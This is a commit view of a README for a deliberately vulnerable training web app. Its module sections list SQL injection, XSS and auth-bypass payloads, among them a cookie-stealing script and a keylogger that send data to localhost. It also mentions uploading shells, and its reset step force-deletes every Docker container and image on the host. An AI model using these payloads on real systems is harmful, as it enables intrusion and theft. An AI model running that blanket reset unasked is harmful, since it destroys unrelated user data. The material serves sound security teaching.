Skip to content

Commit 23d1aa5

Browse files
authored
Create README.md
1 parent 9f7d5aa commit 23d1aa5

1 file changed

Lines changed: 378 additions & 0 deletions

File tree

README.md

Lines changed: 378 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,378 @@
1+
# 516 Hackers Vulnerability Playground 🔓
2+
3+
An intentionally vulnerable web application designed for security training, similar to DVWA but modular. Perfect for learning about web vulnerabilities in a safe, controlled environment.
4+
5+
![Security Training](https://img.shields.io/badge/Purpose-Security%20Training-red)
6+
![Docker](https://img.shields.io/badge/Platform-Docker-blue)
7+
![Node.js](https://img.shields.io/badge/Backend-Node.js-green)
8+
![MySQL](https://img.shields.io/badge/Database-MySQL-orange)
9+
10+
## ⚠️ IMPORTANT WARNING
11+
12+
**FOR TRAINING AND EDUCATIONAL PURPOSES ONLY**
13+
14+
- 🚫 **DO NOT** deploy in production environments
15+
- 🚫 **DO NOT** expose to the internet
16+
- 🚫 **DO NOT** use with real/sensitive data
17+
-**ONLY** use in isolated, local environments
18+
-**ONLY** for legitimate security training
19+
20+
## 🚀 Quick Start
21+
22+
### Prerequisites
23+
- Docker and Docker Compose installed
24+
- Git installed
25+
- At least 2GB free disk space
26+
27+
### Step-by-Step Setup
28+
29+
#### 1. Clone the Repository
30+
```bash
31+
# Clone using HTTPS
32+
git clone https://github.com/516hackers/516-hackers-vuln-playground.git
33+
34+
# Or using SSH
35+
git clone git@github.com:516hackers/516-hackers-vuln-playground.git
36+
37+
# Navigate to project directory
38+
cd 516-hackers-vuln-playground
39+
```
40+
41+
#### 2. Build and Run with Docker
42+
```bash
43+
# Build and start all services
44+
docker-compose up --build
45+
46+
# To run in background (detached mode)
47+
docker-compose up -d --build
48+
```
49+
50+
#### 3. Access the Application
51+
Open your browser and navigate to:
52+
```
53+
http://localhost:3000
54+
```
55+
56+
#### 4. Verify Installation
57+
You should see the main dashboard with four vulnerability modules. The application comes pre-loaded with sample data.
58+
59+
## 🛠️ Project Structure
60+
61+
```
62+
516-hackers-vuln-playground/
63+
├── docker-compose.yml # Multi-container setup
64+
├── README.md # This file
65+
├── backend/
66+
│ ├── package.json # Node.js dependencies
67+
│ ├── server.js # Main Express server
68+
│ ├── Dockerfile # Backend container setup
69+
│ ├── routes/ # Vulnerability modules
70+
│ │ ├── sqli.js # SQL Injection
71+
│ │ ├── xss.js # Cross-site Scripting
72+
│ │ ├── auth.js # Authentication Bypass
73+
│ │ └── file-upload.js # File Upload vulnerabilities
74+
│ └── database/
75+
│ └── init.sql # Database schema and sample data
76+
├── frontend/
77+
│ ├── index.html # Main interface
78+
│ ├── css/
79+
│ │ └── style.css # Styling
80+
│ └── js/
81+
│ └── app.js # Frontend logic
82+
└── scripts/
83+
├── test-sqli.js # SQLi testing scripts
84+
├── test-xss.js # XSS testing scripts
85+
└── test-auth.js # Auth testing scripts
86+
```
87+
88+
## 📚 Vulnerability Modules
89+
90+
### 1. SQL Injection (SQLi) 💉
91+
**Location**: SQL Injection module in the web interface
92+
93+
**Vulnerable Endpoint**: `/sqli/search`
94+
95+
**Practice Payloads**:
96+
```sql
97+
-- Basic bypass
98+
admin' OR '1'='1
99+
100+
-- Union attack
101+
' UNION SELECT 1,2,3,4,5-- -
102+
103+
-- Database enumeration
104+
' UNION SELECT version(),user(),database(),4,5-- -
105+
106+
-- Table extraction
107+
' UNION SELECT table_name,2,3,4,5 FROM information_schema.tables-- -
108+
```
109+
110+
**Learning Objectives**:
111+
- Understand how SQL injection works
112+
- Learn to exploit authentication bypass
113+
- Practice data extraction techniques
114+
- Compare vulnerable vs secure code
115+
116+
### 2. Cross-Site Scripting (XSS) 🦠
117+
**Location**: XSS module in the web interface
118+
119+
**Vulnerable Endpoint**: `/xss/comment`
120+
121+
**Practice Payloads**:
122+
```html
123+
<!-- Basic alert -->
124+
<script>alert('XSS')</script>
125+
126+
-- Image-based XSS
127+
<img src=x onerror=alert(1)>
128+
129+
-- Cookie theft
130+
<script>fetch('http://localhost:3000/steal?cookie='+document.cookie)</script>
131+
132+
-- Keylogger
133+
<script>document.onkeypress=function(e){fetch('http://localhost:3000/log?key='+e.key)}</script>
134+
```
135+
136+
**Learning Objectives**:
137+
- Understand reflected vs stored XSS
138+
- Learn DOM-based XSS techniques
139+
- Practice input sanitization methods
140+
- Compare vulnerable vs secure implementations
141+
142+
### 3. Authentication Bypass 🔑
143+
**Location**: Authentication Bypass module
144+
145+
**Vulnerable Endpoint**: `/auth/login-weak`
146+
147+
**Practice Techniques**:
148+
```sql
149+
-- SQL injection in login
150+
admin' OR '1'='1'-- -
151+
152+
-- Password field bypass
153+
admin' OR '1'='1'-- -
154+
155+
-- Always true condition
156+
' OR 1=1-- -
157+
```
158+
159+
**Learning Objectives**:
160+
- Understand weak authentication mechanisms
161+
- Learn session management vulnerabilities
162+
- Practice privilege escalation
163+
- Implement secure authentication
164+
165+
### 4. File Upload Vulnerabilities 📁
166+
**Location**: File Upload module
167+
168+
**Vulnerable Endpoint**: `/file-upload/insecure`
169+
170+
**Practice Uploads**:
171+
- PHP shell files
172+
- Executable files with dangerous extensions
173+
- Overwrite existing files
174+
- Path traversal in filenames
175+
176+
**Learning Objectives**:
177+
- Understand unrestricted file upload risks
178+
- Learn file type validation
179+
- Practice secure upload configurations
180+
- Implement proper file sanitization
181+
182+
## 🔧 Management Commands
183+
184+
### Starting and Stopping
185+
```bash
186+
# Start services
187+
docker-compose up
188+
189+
# Start in background
190+
docker-compose up -d
191+
192+
# Stop services
193+
docker-compose down
194+
195+
# Stop and remove volumes (reset data)
196+
docker-compose down -v
197+
198+
# View logs
199+
docker-compose logs
200+
201+
# View specific service logs
202+
docker-compose logs web
203+
docker-compose logs db
204+
```
205+
206+
### Database Operations
207+
```bash
208+
# Access MySQL database
209+
docker-compose exec db mysql -u root -p vuln_app
210+
# Password: password
211+
212+
# Reset database
213+
docker-compose down -v
214+
docker-compose up -d
215+
```
216+
217+
### Development Commands
218+
```bash
219+
# Access backend container
220+
docker-compose exec web sh
221+
222+
# Install new dependencies
223+
docker-compose exec web npm install <package>
224+
225+
# View application logs
226+
docker-compose logs web -f
227+
```
228+
229+
## 🧪 Testing Scripts
230+
231+
Run automated tests to verify vulnerabilities:
232+
233+
```bash
234+
# Test SQL Injection vulnerabilities
235+
node scripts/test-sqli.js
236+
237+
# Test XSS vulnerabilities
238+
node scripts/test-xss.js
239+
240+
# Test authentication bypass
241+
node scripts/test-auth.js
242+
```
243+
244+
## 🎯 Learning Path
245+
246+
### Beginner Level
247+
1. Start with SQL Injection module
248+
2. Try basic payloads like `admin' OR '1'='1`
249+
3. Understand how the vulnerable code works
250+
4. Compare with the secure version
251+
252+
### Intermediate Level
253+
1. Practice advanced SQLi techniques
254+
2. Experiment with different XSS payloads
255+
3. Try authentication bypass methods
256+
4. Understand session management issues
257+
258+
### Advanced Level
259+
1. Chain multiple vulnerabilities
260+
2. Write custom exploit scripts
261+
3. Analyze the secure code implementations
262+
4. Propose additional security improvements
263+
264+
## 🔒 Security Best Practices Demonstrated
265+
266+
Each module includes both **vulnerable** and **secure** implementations:
267+
268+
### SQL Injection Protection
269+
- **Vulnerable**: String concatenation in queries
270+
- **Secure**: Parameterized queries with prepared statements
271+
272+
### XSS Protection
273+
- **Vulnerable**: Direct output without sanitization
274+
- **Secure**: Input validation and output encoding
275+
276+
### Authentication Security
277+
- **Vulnerable**: Plain text passwords, SQL in authentication
278+
- **Secure**: Password hashing, parameterized queries, session management
279+
280+
### File Upload Security
281+
- **Vulnerable**: No file type checking, original filenames
282+
- **Secure**: Whitelist validation, safe filenames, size limits
283+
284+
## 🐛 Troubleshooting
285+
286+
### Common Issues
287+
288+
**Port already in use**:
289+
```bash
290+
# Change ports in docker-compose.yml
291+
ports:
292+
- "3001:3000" # Use different host port
293+
```
294+
295+
**Database connection issues**:
296+
```bash
297+
# Reset everything
298+
docker-compose down -v
299+
docker-compose up --build
300+
```
301+
302+
**Application not loading**:
303+
```bash
304+
# Check if all services are running
305+
docker-compose ps
306+
307+
# Check logs for errors
308+
docker-compose logs
309+
```
310+
311+
**File uploads not working**:
312+
```bash
313+
# Ensure upload directories exist
314+
mkdir -p backend/uploads backend/secure-uploads
315+
316+
# Check directory permissions
317+
chmod 755 backend/uploads backend/secure-uploads
318+
```
319+
320+
### Reset Everything
321+
```bash
322+
# Complete reset
323+
docker-compose down -v
324+
docker rm -f $(docker ps -aq)
325+
docker rmi -f $(docker images -q)
326+
docker-compose up --build
327+
```
328+
329+
## 📖 Educational Resources
330+
331+
### Recommended Learning Materials
332+
- OWASP Top 10
333+
- Web Application Security Testing methodologies
334+
- Secure coding practices
335+
- Penetration testing frameworks
336+
337+
### Next Steps After This Playground
338+
1. Try other vulnerable applications (DVWA, WebGoat, bWAPP)
339+
2. Practice on bug bounty platforms (with permission)
340+
3. Study secure coding guidelines
341+
4. Explore advanced exploitation techniques
342+
343+
## 🤝 Contributing
344+
345+
We welcome contributions! Please:
346+
347+
1. Fork the repository
348+
2. Create a feature branch
349+
3. Make your changes
350+
4. Add tests if applicable
351+
5. Submit a pull request
352+
353+
### Adding New Vulnerabilities
354+
1. Create new route file in `backend/routes/`
355+
2. Add frontend interface in `frontend/`
356+
3. Update navigation in `frontend/index.html`
357+
4. Add test scripts in `scripts/`
358+
5. Update this README
359+
360+
## 📄 License
361+
362+
This project is for educational purposes only. Use responsibly and only in environments you own or have explicit permission to test.
363+
364+
## 🆘 Support
365+
366+
If you encounter issues:
367+
1. Check the troubleshooting section above
368+
2. Review Docker and system requirements
369+
3. Check the GitHub issues page
370+
4. Create a new issue with detailed information
371+
372+
---
373+
374+
**Remember**: With great power comes great responsibility. Use these skills ethically and legally! 🛡️
375+
376+
---
377+
378+
*Created with ❤️ by 516 Hackers for the security community*

0 commit comments

Comments
 (0)